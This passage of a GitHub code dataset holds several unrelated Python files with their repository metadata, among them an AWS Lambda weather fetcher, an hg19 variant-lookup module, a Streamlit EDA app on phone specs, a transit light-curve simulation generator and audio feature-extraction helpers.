= {\n \"Authorization\": os.getenv(\"OPEN_API_KEY\"),\n \"format\": \"JSON\",\n \"locationName\": city,\n \"sort\": \"time\",\n \"limit\": 1,\n \"offset\": 0,\n \"elementName\": elementName,\n }\n res = requests.get(url, params=params, headers=headers)\n\n if res.status_code != 200 or res.headers[\"Content-Type\"] != \"application/json;charset=utf-8\":\n print(\"取得天氣資料發生錯誤\", res.status_code)\n return False\n data = res.json()\n if len(data[\"records\"][\"location\"]) == 0:\n print(\"此筆天氣資料為空\", data[\"records\"])\n return False\n weather_element_value = data[\"records\"][\"location\"][0][\"weatherElement\"][0]\n return weather_element_value\n\n\ndef parse_weather_temp(weather_status):\n return {\"temperature\": int(weather_status[\"time\"][0][\"parameter\"][\"parameterName\"])}\n\n\ndef lambda_handler(event, context):\n print(\"START EVENT\", event)\n # 每個function 都要做的事\n body = json.loads(event[\"Records\"][0][\"body\"])\n print(f\"來源內容{body}\")\n queue_obj = QueueObj(None, body)\n current_job = Job(queue_obj.steps[queue_obj.step_now])\n current_job.update_start_time() # 更新開始時間\n customer_input = current_job.parse_customer_input(queue_obj.steps)\n\n # get_weather 獨特做的事\n city = customer_input[\"city\"]\n condition = customer_input[\"condition\"]\n # temperature = customer_input[\"temperature\"]\n weather_status = get_weather(city, condition)\n if not weather_status:\n job_status = \"failed\"\n results_output = {}\n for output in parseString(current_job.config_output):\n results_output[output[\"name\"]] = \"Error\"\n else:\n job_status = \"success\"\n results_output = parse_weather_temp(weather_status)\n\n # 每個function 都要做的事\n current_job.update_job_status(job_status)\n current_job.update_result_output(results_output)\n current_job.update_end_time()\n\n queue_obj.update_job_status(current_job)\n queue_obj.put_to_sqs()\n\n return {\"lambda msg\": results_output}\n","repo_name":"tzutingspace/functionflow_lambda","sub_path":"lambda/code/fn/get_weather/get_weather.py","file_name":"get_weather.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"22190345790","text":"# -*- mode: python -*-\r\n\r\nblock_cipher = None\r\n\r\n\r\na = Analysis(['inpy.py'],\r\n pathex=['D:\\\\inPy(sdk,exe°æ±¾,printÖÐÎİæ)'],\r\n binaries=[],\r\n datas=[],\r\n hiddenimports=[],\r\n hookspath=[],\r\n runtime_hooks=[],\r\n excludes=[],\r\n 
win_no_prefer_redirects=False,\r\n win_private_assemblies=False,\r\n cipher=block_cipher)\r\npyz = PYZ(a.pure, a.zipped_data,\r\n cipher=block_cipher)\r\nexe = EXE(pyz,\r\n a.scripts,\r\n a.binaries,\r\n a.zipfiles,\r\n a.datas,\r\n name='inpy',\r\n debug=False,\r\n strip=False,\r\n upx=True,\r\n runtime_tmpdir=None,\r\n console=True )\r\n","repo_name":"dohooo/pdf2excel","sub_path":"inpy.spec","file_name":"inpy.spec","file_ext":"spec","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"28065918936","text":"#!/usr/bin/env python3\n#===============================================================================\n# hg19.py\n#===============================================================================\n\n\"\"\"Get the coordinates of a variant from its RSID, or an RSID from its\ncoordinates. \n\nExamples\n--------\nrs10_coord = coord('rs10')\nprint(\n 'rs10 is on chromosome {0.chr} at position {0.pos}'\n .format(rs10_coord)\n)\n\nrs10_coord_tuple = coord_tuple('rs10')\nprint(\n 'rs10 is on chromosome {} at position {}'\n .format(rs10_coord_tuple[0], rs10_coord_tuple[1])\n)\n\nrs_something = rsid(chr=1, pos=10019)\nprint(\n 'The RSID of the variant on chromosome 1 at position 10019 is {}.'\n .format(rs_something)\n)\n\nNotes\n-----\nThis module might be a good place to put more utilities later.\n\ncoord() returns a fancy object, which is useful for writing readable code. \n\ncoord_tuple() returns a tuple, which is more lightweight and useful for going\nfast.\n\nrsid() returns an RSID.\n\nClasses\n-------\nDataDirectory\n storage class for data directory configuration\nCoordinates\n The coordinates of a variant\n\nFunctions\n---------\ncoord\n get the coordinates and return them as an object\ncoord_tuple\n get the coordinates and return them as a tuple\nrsid\n get the rsid and return it as a string\n\nGlobal\n------\npath\n absolute path to the hg19 reference genome\n\"\"\"\n\n\n\n\n# Imports ======================================================================\n\nimport gzip\nimport subprocess\nimport os.path\nimport socket\n\n\n\n\n# Constants ====================================================================\n\nHOSTNAME = socket.gethostname()\n\nPATH = (\n '/data2/broad-resource-bundle-hg19/ucsc.hg19.fasta'\n if\n HOSTNAME == 'holden'\n else\n '/home/data/broad-resource-bundle-hg19/ucsc.hg19.fasta'\n)\n\nSORTED_BY_RSID_FORMAT = (\n '/data2/dbSNP/sorted-by-rsid/{}.bed.gz'\n if\n HOSTNAME == 'holden'\n else\n '/home/data/dbSNP/sorted-by-rsid/{}.bed.gz'\n)\n\nSORTED_BY_COORD_PATH = (\n '/data2/dbSNP/dbSNP150.rsid.bed.gz'\n if\n HOSTNAME == 'holden'\n else\n '/home/data/dbSNP/dbSNP150.rsid.bed.gz'\n)\n\n\n\n\n# Classes ======================================================================\n\nclass Coordinates():\n \"\"\"The coordinates of a variant\"\"\"\n \n def __init__(self, chr, pos):\n self.chr = chr\n self.pos = pos\n self.tuple = chr, pos\n \n def __repr__(self):\n return 'Coordinates(chr={}, pos={})'.format(self.chr, self.pos)\n\n\nclass Variant():\n \"\"\"The id and coordinates of a variant\"\"\"\n \n def __init__(self, id, chr, pos):\n self.id = id\n self.chr = chr\n self.pos = pos\n self.tuple = id, chr, pos\n \n def __repr__(self):\n return 'Variant(id={}, chr={}, pos={})'.format(\n self.id,\n self.chr,\n self.pos\n )\n\n\n\n\n# Functions ====================================================================\n\ndef coord(rsid):\n \"\"\"Get the coordinates and return them as an object\"\"\"\n \n chr, 
pos = coord_tuple(rsid)\n return Coordinates(chr, pos)\n\n\ndef coord_tuple(rsid):\n \"\"\"Get the coordinates and return them as a tuple\"\"\"\n \n with subprocess.Popen(\n ('zcat', SORTED_BY_RSID_FORMAT.format(rsid[:4])),\n stdout=subprocess.PIPE\n ) as zcat:\n with subprocess.Popen(\n (\n 'awk',\n '$4==\"{}\" {{print; exit}}'.format(rsid)\n ),\n stdin=zcat.stdout,\n stdout=subprocess.PIPE\n ) as awk:\n dbsnp_line, _ = awk.communicate()\n try:\n chr, _, pos, _, _, _ = dbsnp_line.decode().split('\\t')\n except ValueError:\n raise ValueError(\n '{} was not found in the database'.format(rsid)\n )\n return chr[3:], int(pos)\n\n\ndef rsid(chr, pos):\n \"\"\"Get the rsid and return it as a string\"\"\"\n \n with subprocess.Popen(\n (\n 'tabix',\n SORTED_BY_COORD_PATH,\n 'chr{0}:{1}-{1}'.format(str(chr).replace('chr', ''), pos)\n ),\n stdout=subprocess.PIPE\n ) as tabix:\n dbsnp_line, _ = tabix.communicate()\n try:\n _, _, _, rsid, *rest = dbsnp_line.decode().split('\\t')\n except ValueError:\n raise ValueError(\n 'A variant at chromosome {}, position {} was not found in the '\n 'database'\n .format(chr, pos)\n )\n return rsid\n\n\ndef range(chr, start, end):\n \"\"\"Generate all variants within a given genomic range\"\"\"\n \n with subprocess.Popen(\n (\n 'tabix',\n SORTED_BY_COORD_PATH,\n 'chr{0}:{1}-{2}'.format(str(chr).replace('chr', ''), start, end)\n ),\n stdout=subprocess.PIPE\n ) as tabix:\n dbsnp_lines, _ = tabix.communicate()\n for dbsnp_line in dbsnp_lines.decode().splitlines():\n chr, _, pos, rsid, *rest = dbsnp_line.split('\\t')\n yield Variant(rsid, chr.replace('chr', ''), int(pos))\n\n\ndef generate_coord_rsid_pairs(file):\n for line in file:\n chr, _, pos, rsid, *alleles = line.split()\n yield (chr.replace('chr', ''), int(pos)), rsid\n\n\ndef coord_rsid_dict():\n \"\"\"A dictionary containing coord: rsid pairs\"\"\"\n \n with gzip.open(SORTED_BY_COORD_PATH, 'rt') as f:\n return dict(generate_coord_rsid_pairs(f))\n\n\n\n\n# test =========================================================================\n\nif __name__ == '__main__':\n rs10_coord = coord('rs10')\n print(\n 'rs10 is on chromosome {0.chr} at position {0.pos}'\n .format(rs10_coord)\n )\n\n rs10_coord_tuple = coord_tuple('rs10')\n print(\n 'rs10 is on chromosome {} at position {}'\n .format(rs10_coord_tuple[0], rs10_coord_tuple[1])\n )\n \n rs_something = rsid(chr=1, pos=10019)\n print(\n 'The RSID of the variant on chromosome 1 at position 10019 is {}.'\n .format(rs_something)\n )\n \n try:\n coord('rs10a')\n except ValueError:\n print('error was handled')\n","repo_name":"kjgaulton/pipelines","sub_path":"kglab-python3-modules/hg19.py","file_name":"hg19.py","file_ext":"py","file_size_in_byte":5974,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"21"} +{"seq_id":"6889485913","text":"SUPER_TO_FINE = {\n 'aquatic mammals': {'beaver', 'dolphin', 'otter', 'seal', 'whale'},\n 'fish': {'aquarium_fish', 'flatfish', 'ray', 'shark', 'trout'},\n 'flowers': {'orchid', 'poppy', 'rose', 'sunflower', 'tulip'},\n 'food containers': {'bottle', 'bowl', 'can', 'cup', 'plate'},\n 'fruit and vegetables': {'apple', 'mushroom', 'orange', 'pear', 'sweet_pepper'},\n 'household electrical devices': {'clock', 'computer', 'keyboard', 'lamp', 'telephone', 'television'},\n 'household furniture': {'bed', 'chair', 'couch', 'table', 'wardrobe'},\n 'insects': {'bee', 'beetle', 'butterfly', 'caterpillar', 'cockroach'},\n 'large carnivores': {'bear', 'leopard', 'lion', 'tiger', 'wolf'},\n 'large man-made 
outdoor things': {'bridge', 'castle', 'house', 'road', 'skyscraper'},\n    'large natural outdoor scenes': {'cloud', 'forest', 'mountain', 'plain', 'sea'},\n    'large omnivores and herbivores': {'camel', 'cattle', 'chimpanzee', 'elephant', 'kangaroo'},\n    'medium-sized mammals': {'fox', 'porcupine', 'possum', 'raccoon', 'skunk'},\n    'non-insect invertebrates': {'crab', 'lobster', 'snail', 'spider', 'worm'},\n    'people': {'baby', 'boy', 'girl', 'man', 'woman'},\n    'reptiles': {'crocodile', 'dinosaur', 'lizard', 'snake', 'turtle'},\n    'small mammals': {'hamster', 'mouse', 'rabbit', 'shrew', 'squirrel'},\n    'trees': {'maple_tree', 'oak_tree', 'palm_tree', 'pine_tree', 'willow_tree'},\n    'vehicles 1': {'bicycle', 'bus', 'motorcycle', 'pickup_truck', 'train'},\n    'vehicles 2': {'lawn_mower', 'rocket', 'streetcar', 'tank', 'tractor'},\n}\n\n\n# FINE_TO_SUPER = {}\n# SUPER_TO_IDX = {}\n# TEST_LABELS_LG = set()\n# for i, (super_class,fine_classes) in enumerate(SUPER_TO_FINE.items()):\n#     SUPER_TO_IDX[super_class] = i\n    \n#     for fine_class in fine_classes:\n#         FINE_TO_SUPER[fine_class] = super_class\n    \n#     TEST_LABELS_LG.update(set(sorted(list(fine_classes),reverse=True)[:1]))\n\n# print('Number of held out classes: ', len(TEST_LABELS_LG))","repo_name":"BigRedT/vico","sub_path":"exp/cifar100/test_labels.py","file_name":"test_labels.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"21"}
{"seq_id":"10450486302","text":"# 11724: Number of Connected Components\n# For sparse graphs, an adjacency list is much faster\n\nimport sys\nsys.setrecursionlimit(10**6)\n\ndef dfs(start):\n    for i in range(vertex):\n        if graph[start][i] == 1 and visit[i] == 0:\n            visit[i] = 1\n            dfs(i)\n\n\nvertex, edge = map(int,sys.stdin.readline().split())\ngraph =[[0]*vertex for _ in range(vertex)]\nvisit = [0]*vertex\ncount = 0\n\nfor _ in range(edge):\n    st,ed = map(int,sys.stdin.readline().split())\n    graph[st-1][ed-1] = 1\n    graph[ed-1][st-1] = 1\n\nfor i in range(vertex):\n    if visit[i] == 0:\n        count += 1\n        dfs(i)\n\n\nprint(count)\n\n\n\n\n","repo_name":"inkyu0103/BOJ","sub_path":"DFS , BFS/11724.py","file_name":"11724.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"71218983732","text":"import streamlit as st\r\nimport pandas as pd\r\nimport numpy as np\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\nimport altair as alt\r\nfrom altair import Color, Scale\r\n\r\ndf = pd.read_csv(\"Mobile Classification Data/train.csv\")\r\n\r\nst.markdown(\r\n    \"<h1 style='text-align: center; color: MediumSeaGreen;'>Mobile Phone Specs EDA</h1>\",\r\n    unsafe_allow_html=True,\r\n)\r\n\r\nst.markdown(\r\n    \"<h1 style='text-align: center; color: #2596be; font-size: 19px;'><i>by Yashwant Jankay</i></h1>\",\r\n    unsafe_allow_html=True,\r\n)\r\n\r\n\r\nst.subheader(\"Here is a snapshot of the dataset:\")\r\nst.write(df.head())\r\n\r\nst.markdown(\r\n    \"\"\"\r\n| Column Name | Description |\r\n| :-------------: |:-------------:| \r\n| battery_power | Total energy a battery can store at one time, measured in mAh | \r\n| blue | Has bluetooth or not | \r\n| clock_speed | speed at which microprocessor executes instructions | \r\n| dual_sim | Has dual sim support or not | \r\n| fc | Front Camera mega pixels | \r\n| four_g | Has 4G or not | \r\n| int_memory | Internal Memory in Gigabytes | \r\n| m_dep | Mobile Depth in cm | \r\n| mobile_wt | Weight of mobile phone | \r\n| n_cores | Number of cores of processor | 
\r\n| pc | Primary Camera mega pixels | \r\n| px_height | Pixel Resolution Height | \r\n| px_width | Pixel Resolution Width | \r\n| ram | Random Access Memory in Mega Bytes | \r\n| sc_h | Screen Height of mobile in cm | \r\n| sc_w | Screen Width of mobile in cm | \r\n| talk_time | longest time that a single battery charge will last on a phone call | \r\n| three_g | Has 3G or not | \r\n| touch_screen | Has touch screen or not | \r\n| wifi | Has wifi or not | \r\n| price_range | This is the target variable with value of 0(low cost), 1(medium cost), 2(high cost) and 3(very high cost) | \r\n\r\n\"\"\"\r\n)\r\n\r\nst.markdown(\"\\n\")\r\nst.markdown(\"\\n\")\r\n\r\nfig1 = plt.figure()\r\nsns.boxenplot(df.price_range, df.ram)\r\nplt.ylabel(\"RAM (in MB)\")\r\nplt.xlabel(\"Price\")\r\nplt.xticks(ticks=[0, 1, 2, 3], labels=[\"Low\", \"Medium\", \"High\", \"Very High\"])\r\n\r\nst.markdown(\r\n    \"<span style='color:MediumVioletRed'><u> **Exploratory Data Analysis:** </u></span>\",\r\n    unsafe_allow_html=True,\r\n)\r\nst.markdown(\r\n    \"Our primary focus will be - determining the **_relationships among features_**.\"\r\n)\r\nst.markdown(\"**Finally, we will evaluate whether this dataset is real or not.**\")\r\n\r\nst.markdown(\"Let's start with a Box plot of **Price** vs **RAM**\")\r\n\r\nst.write(fig1)\r\n\r\nst.markdown(\r\n    \"RAM size and phone price are *__positively correlated__*! This makes intuitive sense.\"\r\n)\r\n\r\nst.markdown(\r\n    \"Now a look at a Bar plot of **Number of phones that have a Touch Screen** and **color coding them with their respective price ranges**:\"\r\n)\r\n\r\nfig2 = plt.figure()\r\nsns.set_style(\"whitegrid\")\r\nsns.countplot(df.touch_screen, hue=df.price_range, palette=\"spring\")\r\nplt.xlabel(\"Touch Screen\")\r\nplt.xticks(ticks=[0, 1], labels=[\"No\", \"Yes\"])\r\nplt.legend(\r\n    labels=[\"Low\", \"Moderate\", \"High\", \"Very High\"],\r\n    shadow=True,\r\n    loc=\"lower right\",\r\n    title=\"Price\",\r\n    fontsize=\"small\",\r\n)\r\n\r\nst.write(fig2)\r\n\r\nst.markdown(\r\n    \"It appears that phones with touchscreens and no touchscreens are almost equally \\\r\n    distributed among different price ranges. However, **it makes little sense that there\\\r\n    are such a large number of _high_ and _very high_ priced phones with no touchscreens!** \\\r\n    (in fact higher than their corresponding _low_ and _moderate_ price categories)\"\r\n)\r\n\r\nst.markdown(\r\n    \"Next we are going to engineer a new feature! Dividing the pixel \\\r\n    resolution height (*px_height*) by screen height in cm (*sc_h*) - we get \\\r\n    pixels per cm of height. For simplicity, we will call this ** ppcm ** . \"\r\n)\r\n\r\ndf[\"ppcm\"] = df.px_height / df.sc_h\r\n\r\nst.write(df[[\"px_height\", \"sc_h\", \"ppcm\"]].head())\r\n\r\nst.markdown(\"Let's observe the median of ppcm of different price categories-\")\r\n\r\nfig3 = plt.figure()\r\nsns.set_style(\"darkgrid\")\r\nsns.barplot(df.price_range, df.ppcm, palette=\"ocean\")\r\nplt.ylabel(\"Median pixels per cm\")\r\nplt.xlabel(\"Price\")\r\nplt.xticks(ticks=[0, 1, 2, 3], labels=[\"Low\", \"Medium\", \"High\", \"Very High\"])\r\n\r\nst.write(fig3)\r\n\r\nst.markdown(\r\n    \"_Low_ priced phones have a lower pixels per cm as compared to _High_ and _Very \\\r\n    High_ priced phones. With the exception of _Moderately_ priced phones - where the \\\r\n    median of ppcm is higher than that of _High_ priced phones, there seems to be a clear \\\r\n    upward trend - **higher priced phones have a higher pixel density, which is the \\\r\n    result of a sharper screen resolution.** This makes perfect intuitive sense as well!\"\r\n)\r\n\r\n\r\n# figx = alt.Chart(df).mark_point().encode(alt.X(\"pc:Q\"), alt.Y(\"fc:Q\"),)\r\n\r\n# st.altair_chart(figx, use_container_width=True)\r\n\r\nfig4 = plt.figure()\r\nsns.set_style(\"whitegrid\")\r\nsns.pointplot(\r\n    df.four_g,\r\n    df.clock_speed,\r\n    hue=df.price_range,\r\n    scale=1.3,\r\n    dodge=True,\r\n    palette=\"Set1\",\r\n)\r\nplt.ylabel(\"Processor Clock Speed (GHz)\")\r\nplt.xlabel(\"4G Enabled\")\r\nplt.xticks(ticks=[0, 1], labels=[\"No\", \"Yes\"])\r\nplt.legend(\r\n    shadow=True, title=\"Price\", fontsize=\"small\",\r\n)\r\n\r\nst.write(fig4)\r\n\r\nst.markdown(\r\n    \"An interesting trend that can be observed here is that category **_3_** priced \\\r\n    (very high priced) phones have a higher clock speed on non - 4G enabled phones as \\\r\n    compared to 4G enabled phones. \\\r\n    This seems a little weird - as 4G enabled phones need faster (higher) clock rates\\\r\n    than non - 4G enabled phones. This trend appears to be inverse for very high priced\\\r\n    phones.\"\r\n)\r\n\r\n\r\nst.markdown(\r\n    \"The next visualization is unfortunately our last - but it is special - it is interactive!\\\r\n    We will take a look at ** RAM ** vs the ** pixels per cm ** feature that we engineered earlier.\\\r\n    Below this scatterplot, there is going to be a bar chart denoting the number of mobile phones\\\r\n    belonging to that price range. This bar chart changes with the area selected on the scatterplot.\\\r\n    *Please note that this is an interactive plot, so please go ahead and make a selection\\\r\n    on the plot and watch the bar chart below change!*\"\r\n)\r\n\r\nbrush = alt.selection(type='interval')\r\n\r\npoints = alt.Chart(df).mark_point().encode(\r\n    x='ram:Q',\r\n    y='ppcm:Q',\r\n    color=alt.condition(brush, 'price_range:N', alt.value('lightgray'))\r\n).properties(\r\n    width=700,\r\n    height=400).add_selection(\r\n    brush\r\n)\r\n\r\nbars = alt.Chart(df).mark_bar().encode(\r\n    y='price_range:N',\r\n    color='price_range:N',\r\n    x='count(price_range):Q'\r\n).properties(\r\n    width=700).transform_filter(\r\n    brush\r\n)\r\n\r\nst.altair_chart(points & bars, use_container_width=True)\r\n\r\nst.markdown(\"Ideally, the trend needs to be upward and positive - as expensive phones have higher pixel densities \\\r\nand more RAM. But there is something very unsettling here. We can observe that there are some phones which are in \\\r\n    the ** very high (3)** price range and still have pretty poor pixel densities \\\r\n    (lower right section of the scatterplot, populated by blue circles). This is not the case in a real world scenario. \\\r\n    Such phones rarely get released and have extremely limited scope to attract customers or generate revenue. \")\r\n\r\nst.markdown(\"\\n\")\r\n\r\nst.markdown(\"** Our final conclusion is that apart from the RAM feature, the other features _do NOT reflect real-world phone feature vs price relationships._\\\r\n    This dataset might be synthetically generated with RAM being the only properly correlated feature. 
**\")","repo_name":"yashwantreddy/MobilePhones","sub_path":"streamlit_demo.py","file_name":"streamlit_demo.py","file_ext":"py","file_size_in_byte":7745,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"19632002379","text":"import matplotlib.pyplot as plt\nimport george\nimport itertools\nimport numpy as np\nimport batman\nimport os\n\ndef reverse_ld_coeffs(ld_law, q1, q2):\n if ld_law == 'quadratic':\n coeff1 = 2.*np.sqrt(q1)*q2\n coeff2 = np.sqrt(q1)*(1.-2.*q2)\n elif ld_law=='squareroot':\n coeff1 = np.sqrt(q1)*(1.-2.*q2)\n coeff2 = 2.*np.sqrt(q1)*q2\n elif ld_law=='logarithmic':\n coeff1 = 1.-np.sqrt(q1)*q2\n coeff2 = 1.-np.sqrt(q1)\n elif ld_law == 'linear':\n return q1,q2\n return coeff1,coeff2\n\ndef init_batman(t,law):\n \"\"\" \n This function initializes the batman code.\n \"\"\"\n params = batman.TransitParams()\n params.t0 = 0. \n params.per = 1. \n params.rp = 0.1 \n params.a = 15. \n params.inc = 87. \n params.ecc = 0. \n params.w = 90. \n if law == 'linear':\n params.u = [0.5]\n else:\n params.u = [0.1,0.3]\n params.limb_dark = law \n m = batman.TransitModel(params,t)\n return params,m\n\ndef get_transit_model(t,t0,P,p,a,inc,q1,q2,ld_law):\n params,m = init_batman(t,law=ld_law)\n coeff1,coeff2 = reverse_ld_coeffs(ld_law, q1, q2) \n params.t0 = t0\n params.per = P \n params.rp = p \n params.a = a\n params.inc = inc\n if ld_law == 'linear':\n params.u = [coeff1]\n else:\n params.u = [coeff1,coeff2]\n return m.light_curve(params)\n\ninputs = np.genfromtxt('w19_parameters.dat',unpack=True)\n\n# Standarize the inputs:\nfor i in range(len(inputs)):\n norm_input = (inputs[i] - np.mean(inputs[i]))/np.sqrt(np.var(inputs[i]))\n if i == 0:\n X = norm_input\n times = inputs[i]\n else:\n X = np.vstack((X,norm_input))\n\n# Define base flux (white) noise:\nsigma = 200*1e-6\nyerr = np.ones(len(times))*sigma\n\n# Define maximum variance (i.e., the total variance of the GP):\nmax_sigma = 2000.\nmax_var = (max_sigma*1e-6)**2\n\n# Define number of simulations:\nnsims = 300\n\n# Define transit model:\nt0 = times[len(times)/2]\nP = 3.0\np = 0.1\naR = 10.\ninc = 88.0\nq1,q2 = 0.5,0.5\nmodel = get_transit_model(times.astype('float64'),t0,P,p,aR,inc,q1,q2,'quadratic')\n\n# Name of the variables:\nnames = ['times','Deltas','FWHM','Z','g','trace']\nidx_names = range(len(names))\n\n# Generate all possible combinations of external parameters, and generate datasets:\nfor L in range(0, len(idx_names)+1):\n for subset in itertools.combinations(idx_names, L):\n if len(subset) != 0:\n for n in range(nsims):\n if n == 0:\n cnames = list( names[i] for i in subset)\n fname = '_'.join(cnames)\n os.mkdir(fname)\n fout = open(fname+'/dataset_'+str(n)+'.dat','w')\n # Generate nsims datasets per model:\n Xc = X[subset,:]\n # Generate gaussian process. 
For this, sample lambdas from uniform distribution:\n ndim = Xc.shape[0]\n lambdas = np.random.uniform(0,10,ndim)\n fout.write('# Lambdas: '+' '.join(lambdas.astype('str'))+' | Sigma: '+str(sigma*1e6)+' ppm | Max (GP) Sigma: '+str(max_sigma)+' ppm\\n')\n fout.write('# Times \\t Simulated data \\t Transit Model \\t GP\\n')\n # Compute kernel:\n kernel = max_var*george.kernels.ExpSquaredKernel(lambdas,ndim=ndim,axes=range(ndim))\n # Prepare GP object:\n gp = george.GP(kernel)\n gp.compute(Xc.T)\n # Sample GP, add gaussian noise and save\n GP = gp.sample(Xc.T)\n noise = np.random.normal(0.,sigma,len(times))\n total = model + GP + noise\n for i in range(len(times)):\n fout.write('{0:.10f} \\t {1:.10f} \\t {2:.10f} \\t {3:.10f}\\n'.format(times[i],total[i],model[i],GP[i]))\n","repo_name":"nespinoza/GPOS","sub_path":"data_generator/generate_datasets.py","file_name":"generate_datasets.py","file_ext":"py","file_size_in_byte":3784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26371789215","text":"import tkinter as tk\nfrom tkinter import Frame, ttk\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\nfrom matplotlib.figure import Figure\n\nclass Vista_Pestaña1:\n def __init__(self, controlador):\n self.controlador = controlador\n\n self.ventanaP1 = tk.Tk()\n self.ventanaP1.title(\"Datos Generales\")\n self.ventanaP1.geometry(\"1200x700\")\n self.ventanaP1.resizable(False, False)\n\n self.main_frame = tk.Frame(self.ventanaP1)\n self.main_frame.pack(fill=tk.BOTH, expand=True)\n\n self.left_frame = tk.Frame(self.main_frame)\n self.left_frame.pack(side=tk.LEFT, fill=tk.BOTH, expand=True)\n\n self.right_frame = tk.Frame(self.main_frame)\n self.right_frame.pack(side=tk.LEFT, fill=tk.BOTH, expand=True)\n\n self.create_treeview()\n self.create_plot()\n self.label1 = tk.Label(self.left_frame, text=\"Nombre del archivo\")\n self.label1.pack()\n self.entry1 = tk.Entry(self.left_frame)\n self.entry1.pack()\n self.crear_boton()\n def agregar_datosarbolpestaña1(self, datos):\n for fila in self.tree1.get_children():\n self.tree1.delete(fila)\n for indice, fila in enumerate(datos):\n valores = fila\n self.tree1.insert('', 'end', text=str(indice), values=valores)\n def create_treeview(self):\n self.tree1 = ttk.Treeview(self.right_frame, height=20)\n self.tree1['columns'] = ('Columna1', 'Columna2', 'Columna3','Columna4')\n\n self.tree1.heading('#0', text='Índice')\n self.tree1.column('#0', anchor=tk.CENTER, width=80)\n self.tree1.heading('Columna1', text='Fuerza Horizontal \\n N')\n self.tree1.column('Columna1', anchor=tk.CENTER, width=100)\n self.tree1.heading('Columna2', text='Desplazamiento Horizontal \\n mm')\n self.tree1.column('Columna2', anchor=tk.CENTER, width=100)\n self.tree1.heading('Columna3', text='Desplazamiento Vertical \\n mm')\n self.tree1.column('Columna3', anchor=tk.CENTER, width=100)\n self.tree1.heading('Columna4', text='Esfuerzo cortante')\n self.tree1.column('Columna4', anchor=tk.CENTER, width=100)\n self.tree1.pack(side=tk.LEFT, padx=10, pady=10)\n\n def create_plot(self):\n fig1 = Figure(figsize=(5, 4), dpi=100)\n ax1 = fig1.add_subplot(111)\n x = [0, 0.4, 0.8, 1.2, 1.6, 2, 2.4, 2.8, 3.2, 3.6, 4]\n y = [0, 3.514132926, 5.551311434, 6.977336389, 7.894066718, 8.148714031, 8.148714031, 8.148714031, 8.148714031,\n 8.148714031, 8.148714031]\n ax1.scatter(x, y)\n ax1.plot(x, y, 'r-') # 'r-' indica una línea roja\n\n canvas = FigureCanvasTkAgg(fig1, master=self.left_frame)\n canvas.draw()\n 
canvas.get_tk_widget().pack(padx=10, pady=10)\n def crear_boton(self):\n self.boton = tk.Button(self.left_frame, text=\"Generar Graficas\", command=self.controlador.generar_pdf,\n width=25, height=5, borderwidth=2)\n self.boton.pack()\n def obtener_nombreArchivo(self):\n return self.entry1.get()\n def cerrar_pestaña(self):\n self.ventanaP1.destroy()\n def iniciar(self):\n self.ventanaP1.mainloop()","repo_name":"yair-r/nueva_MCD","sub_path":"Vista/vista_pestaña1.py","file_name":"vista_pestaña1.py","file_ext":"py","file_size_in_byte":3209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71807424374","text":"import os\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nimport librosa as lb\nfrom librosa.display import specshow\n\n# Drop axis since data is only single channel\ndef squeeze(audio, labels):\n audio = tf.squeeze(audio, axis=-1)\n #audio = tf.expand_dims(audio, axis=-1)\n return audio, labels\n\ndef get_features(waveform, sample_rate):\n stfts = tf.signal.stft(waveform, frame_length=255, frame_step=128)\n spectrogram = tf.abs(stfts)\n\n num_spectrogram_bins = stfts.shape[-1]\n lower_edge_hertz, upper_edge_hertz, num_mel_bins = 80.0, 7600.0, 80\n linear_to_mel_weight_matrix = tf.signal.linear_to_mel_weight_matrix(\n num_mel_bins, num_spectrogram_bins, sample_rate, lower_edge_hertz,\n upper_edge_hertz)\n mel_spectrogram = tf.tensordot(\n spectrogram, linear_to_mel_weight_matrix, 1)\n mel_spectrogram.set_shape(spectrogram.shape[:-1].concatenate(\n linear_to_mel_weight_matrix.shape[-1:]))\n\n # Compute a stabilized log to get log-magnitude mel-scale spectrograms.\n log_mel_spectrogram = tf.math.log(mel_spectrogram + 1e-6)\n # Compute MFCCs from log_mel_spectrograms and take the first 13.\n mfcc = tf.signal.mfccs_from_log_mel_spectrograms(\n log_mel_spectrogram)[..., :128]\n\n features = tf.stack([spectrogram, mel_spectrogram, mfcc], axis=-1)\n #all_four = tf.squeeze(all_four, axis=1)\n return features\n\n\ndef get_spectrogram(waveform):\n # Convert the waveform to a spectrogram via a STFT.\n spectrogram = tf.signal.stft(waveform, frame_length=255, frame_step=128)\n # Obtain the magnitude of the STFT.\n spectrogram = tf.abs(spectrogram)\n # Add a `channels` dimension, so that the spectrogram can be used\n # as image-like input data with convolution layers (which expect\n # shape (`batch_size`, `height`, `width`, `channels`).\n spectrogram = spectrogram[..., tf.newaxis]\n return spectrogram\n\ndef get_melspec(waveform, sample_rate):\n # A 1024-point STFT with frames of 64 ms and 75% overlap.\n stfts = tf.signal.stft(waveform, frame_length=255, frame_step=128)\n spectrograms = tf.abs(stfts)\n\n # Warp the linear scale spectrograms into the mel-scale.\n num_spectrogram_bins = stfts.shape[-1]\n lower_edge_hertz, upper_edge_hertz, num_mel_bins = 80.0, 7600.0, 80\n linear_to_mel_weight_matrix = tf.signal.linear_to_mel_weight_matrix(\n num_mel_bins, num_spectrogram_bins, sample_rate, lower_edge_hertz,\n upper_edge_hertz)\n mel_spectrograms = tf.tensordot(\n spectrograms, linear_to_mel_weight_matrix, 1)\n mel_spectrograms.set_shape(spectrograms.shape[:-1].concatenate(\n linear_to_mel_weight_matrix.shape[-1:]))\n\n mel_spectrograms = mel_spectrograms[..., tf.newaxis]\n\n return mel_spectrograms\n\ndef get_mfcc(waveform, 